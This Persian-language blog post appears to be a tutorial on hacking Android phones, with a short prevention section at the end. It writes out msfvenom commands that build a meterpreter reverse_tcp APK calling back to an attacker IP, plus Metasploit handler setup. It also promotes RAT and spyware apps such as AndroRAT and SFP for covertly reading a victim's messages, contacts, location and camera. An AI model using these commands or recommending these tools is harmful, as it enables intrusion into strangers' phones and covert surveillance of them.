ثبت نام لاتاری 2022 آموزش ثبت نام لاتاری گرین کارت آمریکا 2022 لاتاری

هک اندروید و راه های جلوگیری از آن

سلام خدمت شما دوستان عزیز و همراهان گرامی مِستر آموز.

 

سیستم عامل اندروید یک سیستم عامل متن باز است که امکانات بسیار فراوان را در اختیار توسعه دهندگان برنامه ها و سیستم عامل ها فراهم می آورد. این سیستم عامل معمولا دسترسی های بیشتری را برای کاربرانشان ایجاد می کنند. به همین علت، کاربران همیشه در معرض خطر قرار دارند. اندروید نیز از این قاعده مستثنی نبوده و انواع بدافزارها ، ویروس ها و برنامه های هک برای آن نوشته شده است. با مِستر آموز همراه باشید تا نکاتی را درباره روش های هک اندروید و راه های نفوذ به گوشی های اندروید را بررسی کنیم.

 

آیا هک اندروید امکان پذیر است؟

هک هر دستگاه الکترونیکی امکان پذیر است. بطور کلی راه های هک و نفوذ آنقدر زیاد است که بلاخره با یکی از آن ها می توان هر دستگاهی را هک کرد. گوشی های اندروید نیز مانند سایر ابزار الکترونیکی قابلیت هک شدن را دارند اما روش ها متنوع و گوناگون بوده و هر راهی لازم  ابزاری خاص می باشد که به همان نسبت قابلیت های بیشتری را در اختیار هکر قرار می دهد.

اصلی ترین ابزاری که یک هکر برای انجام هک نیاز دارد، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس می باشد که از نسخه کالی لینوکس یا بکترک استفاده کند.اما خبر بد برای دارندگان گوشی های اندروید این است که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شده است و همین عامل سبب می شود پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت پذیرد.

 

هک اندروید از طریق لینوکس

یک هکر برای اینکه بتواند اقدام به هک اندروید کند باید نسخه کالی لینوکس را روی سیستم خود داشته باشد. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند. با استفاده از این ابزار، هکر اقدام به ساخت یک برنامه هک اندروید به صورت APK می نماید. برای ساخت چنین ابزاری هکر تنها نیاز دارد که دستور زیر را در محیط ترمینال لینوکس وارد نماید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در قطعه کد بالا هکر به جای عبارت LHOST می تواند از آدرس IP خودش و در قسمت LPORT از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است که هکر آن را می سازد تا با آن اقدام به هک اندروید کند. که این نام هم قابل تغییر است.

پس از انجام مراحل بالا باید تعدادی از دستورات مختلف را نظیر دستورات زیر در همان محیط ترمینال وارد کند.

Msf>use exploit/multi/handler
Msf>set PAYLOAD android/meterpreter/reverse_tcp
Msf>set LHOST 192.168.1.35
Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کند. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود.

 

اکنون اگر کسی روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک اندروید از طریق لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید کند. تصویر زیر طریقه هک اندروید با استفاده از ترمینال کالی لینوکس است:

code web

 

هک اندروید با استفاده از نرم افزار

البته همه راه های هک اندروید مثل روش قبل پیچیدگی خاصی ندارند و روش های آسونی تری هم ست. بسیاری از هکر ها، برنامه هایی را ساخته اند که به سادگی می تواند با استفاده از غفلت، خودتان گوشی شخص دیگری را هک نماید. تعداد خیلی زیاد است تا حدی که در انتخاب یکی از آن ها ممکن حتی گیج شود. البته این برنامه ها برای اجرا و درست کار کردن نیز نیازمند الزاماتی می باشند که بعضا به سادگی در اختیار فرد هکر قرار نمی گیرند.

به عنوان مثال یکی از این برنامه ها که برای هک اندروید طراحی شده است برنامه AndroRAT نام دارد. نام این برنامه مخفف عبارت دسترسی از راه دور به دستگاه اندروید است.

 

هک گوشی اندروید با برنامه AndroRAT

برنامه AndroRAT یکی از محبوب ترین برنامه های هک اندروید می باشد. این برنامه رایگان بوده و می تواند از راه دور با هک گوشی طرف مقابل، اقدام به ارسال Sms ، مخاطبین و حتی موقعیت فرد قربانی کند. این برنامه حتی قادر است با استفاده از دوربین جلو یا پشت گوشی، بدون اینکه طرف مقابل چیزی بفهمد، اقدام به تصویر برداری نماید.

andriodRat

هک اندروید با برنامه Hackode

Hackode این هم یک برنامه دیگری است که با هدف هک اندروید طراحی شده است. این برنامه نیز مثل برنامه AndroRAT مجموعه ای از ابزار مختلف را در اختیار کاربرانش قرار می دهد که در سه حالت قابل استفاده می باشد. این سه حالت کشف ، اسکن و امنیت می باشند. که کاربر می تواند در یکی از آنها شروع بکار کرد. این برنامه بیشتر جنبه کمک به کارشناسان امنیت داشته و با هدف شناسایی نقاط ضعف سیستم و برنامه ها طراحی شده است. اما از آنجا که این ابزار ها همانند یک چاقوی دولبه عمل می کنند، می توانند به عنوان ابزار هک نیز در اختیار افراد سودجو قرار گیرند.

hackcode

برنامه هک zANTI

این برنامه هم یکی از برنامه هایی است که با هدف انجام تست نفوذ به سیستم طراحی شده است. این برنامه به کارشناسان امنیت شبکه کمک می کند در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکهنمایند. این برنامه هک اندروید به برنامه Backtrack گوشی معروف شده است چرا که همانند سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربر برای انجام عمل هک قرار می دهد و از طرفی قدرت فوق العاده نیز دارد.

برنامه SFP برای کنترل گوشی از راه دور

یکی دیگر از برنامه هایی که با هدف نظارت و کنترل از راه دور گوشی های اندروید و حتی ios طراحی شده است، برنامه SFP می باشد. البته این برنامه بیشتر یک برنامه نظارتی محسوب می شود تا یک برنامه هک اندروید. این برنامه یک بار روی گوشی طرف مقابل نصب شده و پس از آن اقدام به ارسال اطلاعات مختلف از گوشی فرد می نماید. این برنامه علاوه بر ارسال موقعیت لحظه به لحظه، قادر است با استفاده از دسترسی هایی که دارد به پیام های تلگرام ، اینستاگرام ، لاین و واتس اپ شخص نیز دسترسی پیدا کند. همچنین با استفاده از این برنامه می توان به اطلاعات تمامی مخاطبین، پیامک ها، تماس ها و غیره نیز دسترسی داشت. این برنامه برای کارکرد صحیح نیاز به شماره طرف مقابل ندارد و از این جهت بسیار کاربردی نیز می باشد.

روش های جلوگیری از هک اندروید

همانطور با مِستر آموز بررسی کردیم. دیدیم که به سادگی هرچه تمام تر تنها با استفاده از چندخط کد یا استفاده از برنامه ای خاص می توانیم یک گوشی اندروید را از راه دور هک کنیم. اما برای اینکه هک نشویم، چه کاری می توان انجام داد؟

یکی از راه های جلوگیری از هک شدن استفاده از یک آنتی ویروس بروز و آپدیت شده درگوشی اندرویدی خود است. یک آنتی ویروس قدرتمند توانایی جلوگیری از بسیاری حملات را دارد که می تواند بسیار در زمینه جلوگیری از هک شدن مثمر ثمر باشد.

نکته قابل توجه دیگر این است که باید هوشیار باشید که اکثر برنامه هایی که در اینترنت موجود می باشند و بسیاری از افراد اقدام به تبلیغ آن می کنند و یا برنامه با عناوینی جذاب سعی در جذب شما دارد، یک برنامه مخرب مثل تروجان و یا برنامه ای برای هک گوشی اندروید شما می باشد. پس باید قبل از نصب هر برنامه ای در گوشی خود، ابتدا بدانید که منبع این برنامه کجاست؟ آیا این برنامه در سرویس گوگل پلی موجود است؟ چرا باید من این برنامه را نصب کنم؟ آیا ادعایی که این برنامه دارد واقعا با عقل جور در می آید؟ حقیقت این است که بسیاری از برنامه هایی که به این شکل سعی در جذب مخاطب دارند توسط هکر هایی چیره دست طراحی شده اند تا اقدام به جاسوسی از شما نمایند.

not hack

 

حرف آخر

و در آخر باید گفت که گوشی خود را در اختیار افراد غیر قابل اعتماد قرار ندهید. بسیاری از برنامه هایی که به شما معرفی گردید برای هک اندروید ، یکی از الزاماتشان این است که به گوشی فرد هک شونده دسترسی داشته باشیم. پس اگر گوشی اندرویدی خود را در اختیار افراد دیگر قرار ندهیم می توانیم تا حد بسیار زیادی از هک شدن گوشی خود جلوگیری نماییم.

 

موفق و پیروز باشید.

 

 

نظر خودتان را ارسال کنید